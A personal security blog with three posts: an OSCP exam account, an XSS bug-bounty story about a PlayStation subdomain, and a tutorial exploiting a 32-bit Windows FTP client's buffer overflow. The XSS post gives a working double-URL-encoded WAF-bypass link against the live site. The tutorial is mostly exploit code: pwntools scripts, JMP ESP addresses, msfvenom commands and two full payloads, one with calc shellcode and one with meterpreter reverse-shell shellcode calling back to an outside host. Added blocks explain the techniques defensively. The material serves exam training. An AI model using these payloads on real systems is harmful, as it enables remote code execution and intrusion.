
Windows Buffer Overflow

Into the OSCP Journey

When people hear OSCP, they think of the exam as a beast or a monster that will tear them apart. Yes, I did think like them in the past, but with proper preparation any beast or exam can be defeated. I took the OSCP exam on 27th August 2020 and passed on 31st August 2020. Today I will share my experience of the OSCP journey.

What is OSCP?

OSCP (Offensive Security Certified Professional) is a well-known certification in cyber security. It is famous for its 100% hands-on exam, which is really quite challenging. The exam duration is 24 hours (precisely 23 hours and 45 minutes). In the exam you have to do penetration testing on 5 boxes (meaning 5 computer servers), so timing is also very important. If you want to know the details about OSCP, you can google it, because I'm not going to explain them in detail.

Preparation

Before doing OSCP, I spent most of my time solving the netsecfocus OSCP-like machines from VulnHub and HackTheBox. I completed 85% of the machines. Then I decided to purchase the OSCP course on June 27 and got access to the labs and materials on July 5. In 20 days I solved 35 machines from the OSCP labs, including the big 4, which are considered difficult but are not as difficult as HackTheBox hard machines :C. Then I worried about my Windows privilege escalation skills and decided to purchase Tib3rius's Windows privilege escalation course, which is really good for beginners. I did that course and went roughly through the TryHackMe OSCP learning path. Then I decided to schedule my exam for 27th August and relax my mind for 5 days before the exam.

For netsecfocus OSCP like machines

https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0

Tib3rius’s windows privilege escalation course

https://www.udemy.com/course/windows-privilege-escalation/

Tryhackme OSCP path

https://tryhackme.com/path/outline/OSCP

Exam Day

I scheduled my exam for 7:30 am. Morning is refreshing and the best time to start. Due to my poor internet connection, I started at 7:50 am. The internet connection is very important for this exam. The exam is proctored. The proctor checked my passport for identification, and I had to show around the room and under the desk as they asked. I had to screenshare and allow the proctor access to my webcam, so I recommend checking screensharing and the webcam before taking the exam. As usual, I ran the scans on all boxes while doing the buffer overflow. Before starting the exam, I started my Windows 7 VirtualBox VM on my Kali for preparation, but it turned out to be very disadvantageous. My laptop was super slow and laggy. I was nervous because of the late start, and Immunity Debugger was very laggy on my machine. Because of the nerves, I made mistakes. I did the buffer overflow patiently and after one and a half hours I got the flag. Then I saw that my masscan did not get any output from one of the machines. I decided to scan it again and then my laptop hung. I had to restart my laptop in a hurry and emailed OSCP support about my problems. I reconnected to the exam panel and told them about my problems. Then I resumed my exam, but sadly I did not have any scan results. So I decided to scan and do the boxes one after another. At 1:30 pm sharp I had done 4 boxes and decided to get lunch. After lunch I decided to do the reporting first, because I'm bad at reporting and was worried about my screenshots. After checking my report several times, I ended my exam. The next morning I submitted my report, and I got my exam result on 31st August. I passed the OSCP exam on my 1st attempt.

Tips on taking OSCP exam

  • Enumeration is the key [ once you get access to the OSCP student forum, I recommend reading the Alpha & Beta writeups ]
  • Take as many screenshots as you can
  • Practise reporting
  • Practise boxes without writeups
  • Don't get very nervous if something happens
  • Proper preparation
  • A good laptop, the best internet and a good chair

Good Quotes

  • “Try Harder”
  • “Practice makes perfect”
  • “Every battle is won before it is fought”

Story of Playstation(Sony) XSS

Hello all!!! Today I decided to share my finding of an XSS on a subdomain of PlayStation. It was 1 year ago, I think; I started hunting bugs on Sony websites and first I found directory indexing on [ https://blog.latam.playstation.com/wp-content/ https://blog.latam.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp-content/ https://blog.br.playstation.com/wp/wp-includes/ https://blog.br.playstation.com/wp-content/ https://rd.playstation.com/ ]

Then I reported it to Sony and they didn't accept it because they could not find any impact. I didn't understand why they said that :3 and I was like, okay. Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found QUnit 1.21.0 on the page and decided to search for an exploit on Google. Then I found this page.

There are two PoCs, and the 2nd PoC shows that the parameter testId is vulnerable to XSS. So I decided to give it a try. First I injected the payload <svg onload=alert(1)> and the WAF filtered it. Then I fuzzed a lot and at last, boom! Double URL encoding bypassed the WAF.

So the POC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].
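Why the double-encoded value walked past the filter, and how a filter should canonicalise input before inspecting it, as an added Python 3 example (mine, not part of the original post and not Sony's or the WAF's code): it percent-decodes the testId value from the PoC link above until the string stops changing, compares a filter that decodes once with one that inspects the canonical form, and HTML-escapes the value for output, which is the actual fix on the application side. The two filter functions and the character list they check are my assumptions about what such a filter does, not knowledge of the real WAF.

```python
import html
from urllib.parse import unquote

# The testId value from the PoC link above, split over lines for readability.
POC_TESTID = (
    "%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63"
    "%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32"
    "%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35"
    "%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39"
    "%25%36%65%25%32%39%25%33%65"
)

# Characters a markup-aware filter would look for (assumed list, not the WAF's).
MARKUP_CHARS = "<>\"'"


def decode_to_fixed_point(value, max_rounds=5):
    """Percent-decode repeatedly until the string stops changing.
    A bounded number of rounds keeps a pathological input from looping forever;
    anything that still changes after max_rounds is treated as hostile."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("input still changing after %d decode rounds" % max_rounds)


def naive_filter_allows(value):
    """Filter that decodes exactly once.  The double-encoded PoC decodes to
    '%3c%73...' here, which contains no markup character, so it passes."""
    return not any(c in unquote(value) for c in MARKUP_CHARS)


def hardened_filter_allows(value):
    """Filter that inspects the canonical (fully decoded) form instead."""
    canonical = decode_to_fixed_point(value)
    return not any(c in canonical for c in MARKUP_CHARS)


def safe_render(value):
    """What the page itself should do with the parameter: escape on output,
    so even a value that reaches the DOM renders as text, not as an element."""
    return html.escape(decode_to_fixed_point(value), quote=True)


if __name__ == "__main__":
    print("canonical:", decode_to_fixed_point(POC_TESTID))
    print("single-decode filter allows:", naive_filter_allows(POC_TESTID))
    print("fixed-point filter allows:  ", hardened_filter_allows(POC_TESTID))
    print("escaped for output:", safe_render(POC_TESTID))
```

The design point is that decoding layers and inspection must happen in the same place: a filter that decodes once while the client-side script decodes again is checking a different string from the one that ends up in the page. Output escaping closes the gap regardless of how many encoding layers were applied.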

Then I reported the bug; they replied after 3 months and rewarded a swag that was never shipped to me :V.

That's my story of XSS on PlayStation. Hope you like it. Thanks!!!

Windows Buffer Overflow (32bit ftp)

Today I will show how to exploit a 32-bit Windows buffer overflow. This is my first blog post.

What does buffer mean?

Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs.

Buffer Overflow?

A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.

Introduction

There are a lot of tutorials about this 32-bit FTP Windows buffer overflow, but I want to use a more modern technique while exploiting it. Let's start.

Requirements

  • You can download the 32bit ftp exe file here
  • You can test on any Windows version.
  • Immunity Debugger
  • Pwntools

First you need to load 32bit ftp in Immunity Debugger.

File > Open > select the ftp file and open.

When I run it via the debugger, it asks me for an FTP server IP and port. So we need to create an FTP server and let the FTP client connect to us. Let's create a simple FTP server using pwntools.

from pwn import *

# Listen on the FTP control port; the client running under the debugger connects to us.
l = listen(21)

payload = b"Sent some strings"

_ = l.wait_for_connection()

# An FTP server greets the client with a "220 <text>" banner; pwntools wants bytes.
l.sendline(b"220 " + payload)

Save it as test.py and run it as root, because port 21 is a privileged port:

sudo python test.py

Important: after each crash you need to restart the target in the debugger by pressing Ctrl+F2 or via Debug > Restart.

Next step: let's crash the FTP client with a bunch of "A"s.

from pwn import *

l = listen(21)

payload = b"A" * 1000

_ = l.wait_for_connection()

# Keep the space after 220 so the client parses the banner as a normal reply.
l.sendline(b"220 " + payload)

Great! It crashed. When we look at EIP in the debugger, the stack is filled with a lot of "A"s (EIP = 41414141).

The registers have been overwritten with 41 (hex for "A"). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite EIP. At this point we know that the bytes that land in EIP are somewhere between 1 and 1000 bytes into the buffer, but we are not sure where exactly. What we need to do next is figure out exactly where EIP is located (in bytes) and take control of it.

Next step is to find the offset. Let's find it.

from pwn import *

l = listen(21)

# cyclic() builds a pattern in which every 4-byte window is unique.
payload = cyclic(1000)

_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Take the value in EIP (786A6161) and look it up with cyclic_find(0x786A6161).

Offset = 989
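To make the two crashes above concrete (the "A" crash and the cyclic-pattern crash, together with the bounds-checking point from the buffer overflow definition earlier), here is an added Python 3 example that is not from the original post and does not need pwntools. It re-implements the de Bruijn pattern behind cyclic()/cyclic_find() and models the vulnerable frame as a 989-byte buffer followed by the saved return address, with an unchecked copy beside a bounds-checked one. The frame layout, the placeholder return address and the copy routines are constructed for illustration; the offset 989 and the EIP value 786A6161 are the page's own numbers.

```python
import struct
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) one character at a time: every
    n-character window occurs exactly once, which is what lets the 4 bytes
    found in EIP map back to a single offset.  Same construction as pwntools'
    cyclic(), so the numbers agree with the page."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """First `length` bytes of the pattern (pwntools: cyclic(length))."""
    return "".join(islice(de_bruijn(), length)).encode()


def cyclic_find(eip_value, max_length=65536):
    """Offset of the 4 bytes that landed in EIP (pwntools: cyclic_find()).
    EIP is read as a little-endian dword, so 0x786A6161 is the bytes b"aajx".
    Returns -1 if the value is not part of the pattern."""
    needle = struct.pack("<I", eip_value)
    return cyclic(max_length).find(needle)


# --- toy model of the vulnerable frame -------------------------------------
BUF_SIZE = 989              # the offset the page finds with cyclic_find()
ORIGINAL_RET = 0x00401234   # constructed placeholder for the saved return address


class StackFrame:
    """A fixed-size buffer with the saved return address (EIP) right after it,
    which is the layout the FTP client's crash implies."""

    def __init__(self, buf_size=BUF_SIZE, saved_eip=ORIGINAL_RET):
        self.buf_size = buf_size
        self.mem = bytearray(buf_size) + bytearray(struct.pack("<I", saved_eip))

    @property
    def saved_eip(self):
        return struct.unpack("<I", self.mem[self.buf_size:self.buf_size + 4])[0]

    def unchecked_copy(self, data):
        """strcpy-style copy with no length check: bytes past the buffer
        overwrite the saved EIP (and would keep going in real memory)."""
        n = min(len(data), len(self.mem))   # only stop at the end of the toy memory
        self.mem[:n] = data[:n]

    def checked_copy(self, data):
        """Bounds-checked copy: truncates to the buffer, so EIP is never touched."""
        chunk = data[:self.buf_size]
        self.mem[:self.buf_size] = chunk.ljust(self.buf_size, b"\x00")


def eip_after(data, checked=False):
    """What the saved EIP holds after `data` is copied into a fresh frame."""
    frame = StackFrame()
    (frame.checked_copy if checked else frame.unchecked_copy)(data)
    return frame.saved_eip


if __name__ == "__main__":
    print(hex(eip_after(b"A" * 1000)))            # the first crash: 0x41414141
    eip = eip_after(cyclic(1000))                 # the cyclic-pattern crash
    print(hex(eip), "-> offset", cyclic_find(eip))
    print(hex(eip_after(b"A" * 1000, checked=True)))  # checked copy leaves EIP alone
```

The uniqueness of every 4-byte window is the whole trick: the debugger shows you 4 bytes, and because those 4 bytes occur once in the pattern, their position is the distance from the start of the buffer to the saved return address.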

To execute the shellcode we need the address of a JMP ESP (or CALL ESP) instruction: we place that address in EIP, and it jumps to the address held in ESP, which points at our payload. When you loaded the FTP client in Immunity, you saw that the kernel32.dll module was also loaded, so we look for a jump there and let the shellcode run.

!mona jmp -r esp -m kernel

You will see 3 JMP ESP addresses and 2 CALL ESP addresses. You can use any one of them; all of them work. So let's use one of those addresses with shellcode. First I will pop the calculator; after that I will show how to generate a reverse shell and exploit with it. Let's pop calc.

To generate the calc shellcode with msfvenom:

msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b "\x00"

Note: this FTP client doesn't have any bad characters, so I will not show you the easy way to find bad characters and how to avoid them, but I will write about that in another post.

The goal is Buffer + JMP ESP + NOP sled + shellcode.

Why does this exploit contain NOPs?

Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.

Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

A 128-byte NOP sled is just a group of NOP instructions 128 bytes wide.

NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.

NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.

Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work
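The layout "Buffer + JMP ESP + NOP sled + shellcode" and the sled argument from the quoted answer, as an added Python 3 example (mine, not the post's, and independent of pwntools): build_payload assembles the four parts and refuses an address or shellcode that contains a bad character, and land/sled_covers simulate execution entering at every byte of the sled to confirm that each entry point reaches the shellcode. The two-byte int3 marker used as "shellcode" and the bad-character list are constructed for the example; the offset 989 and the address 0x765A3132 are the values from the calc script on this page.

```python
import struct

NOP = 0x90  # x86 one-byte no-operation


def p32(value):
    """Pack a 32-bit address little-endian, the way it must sit in memory on x86."""
    return struct.pack("<I", value)


def build_payload(offset, jmp_esp_addr, nop_count, shellcode, badchars=b"\x00"):
    """Buffer + JMP ESP address + NOP sled + shellcode, with the sanity checks
    worth running before anything is sent to a target under a debugger.
    `badchars` is the list the msfvenom -b option was given (assumed: only NUL)."""
    for name, part in (("address", p32(jmp_esp_addr)), ("shellcode", shellcode)):
        bad = sorted({b for b in part if b in badchars})
        if bad:
            raise ValueError("%s contains bad chars: %s" % (name, [hex(b) for b in bad]))
    return b"A" * offset + p32(jmp_esp_addr) + bytes([NOP]) * nop_count + shellcode


def land(memory, entry):
    """Toy CPU: start at `entry`, step over every NOP and return the index of
    the first real instruction that would execute (None if we run off the end)."""
    pc = entry
    while pc < len(memory) and memory[pc] == NOP:
        pc += 1
    return pc if pc < len(memory) else None


def sled_covers(nop_count, shellcode):
    """True if every entry point inside the sled ends up at the shellcode start,
    which is the property the quoted answer describes."""
    stack = bytes([NOP]) * nop_count + shellcode
    return all(land(stack, entry) == nop_count for entry in range(nop_count + 1))


if __name__ == "__main__":
    marker = b"\xcc\xcc"  # constructed stand-in for shellcode (two int3 breakpoints)
    payload = build_payload(989, 0x765A3132, 30, marker)
    print(len(payload), "bytes; EIP bytes:", payload[989:993].hex())
    print("sled of 30 covers every entry:", sled_covers(30, marker))
```

Two details the checks enforce: the address goes in little-endian byte order (0x765A3132 becomes 32 31 5a 76 on the wire), and neither the address nor the shellcode may contain a byte the target's string handling would cut or mangle, which for this client is only the NUL terminator.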

Let’s go.

from pwn import *

payload = b"\x41" * 989

# JMP ESP address found with mona. Windows rebases kernel32.dll at every boot
# (ASLR), so take the address from your own mona output after each reboot.
payload += p32(0x765A3132)
payload += b"\x90" * 30
payload += (
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)
l = listen(21)
_ = l.wait_for_connection()

l.sendline(b"220 " + payload)

Okay, calc.exe pops up successfully. Now I will generate the reverse shell shellcode using msfvenom, because I want to control this machine and popping calc isn't enough for me :D

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 --platform win -e x86/alpha_mixed -f c -b '\x00'

Put the result in the Python script and run it.

from pwn import *

payload = b"\x41" * 989

# JMP ESP address from mona for this boot; kernel32.dll is rebased on reboot,
# which is why it differs from the address in the calc script above.
payload += p32(0x771F3132)
payload += b"\x90" * 30

# msfvenom windows/meterpreter/reverse_tcp output (LHOST 10.9.255.232, LPORT 4444).
payload += (
    b"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
    b"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
    b"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
    b"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
    b"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
    b"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
    b"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
    b"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
    b"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
    b"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
    b"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
    b"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
    b"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
    b"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
    b"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
    b"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
    b"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
    b"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
    b"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
    b"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
    b"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
    b"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
    b"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
    b"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
    b"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
    b"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
    b"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
    b"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
    b"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
    b"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
    b"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
    b"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
    b"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
    b"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
    b"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
    b"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
    b"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
    b"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
    b"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
    b"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
    b"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
    b"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
    b"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
    b"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
    b"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
    b"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)
l = listen(21)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)

Wait for the connection (the meterpreter handler) in another terminal.

Gotcha..!!!

Let's break!

Exploit development is a long journey. It's endless; we just have to keep running. 😀 😀

If you face any trouble during testing, just ping me.

./ht00lay
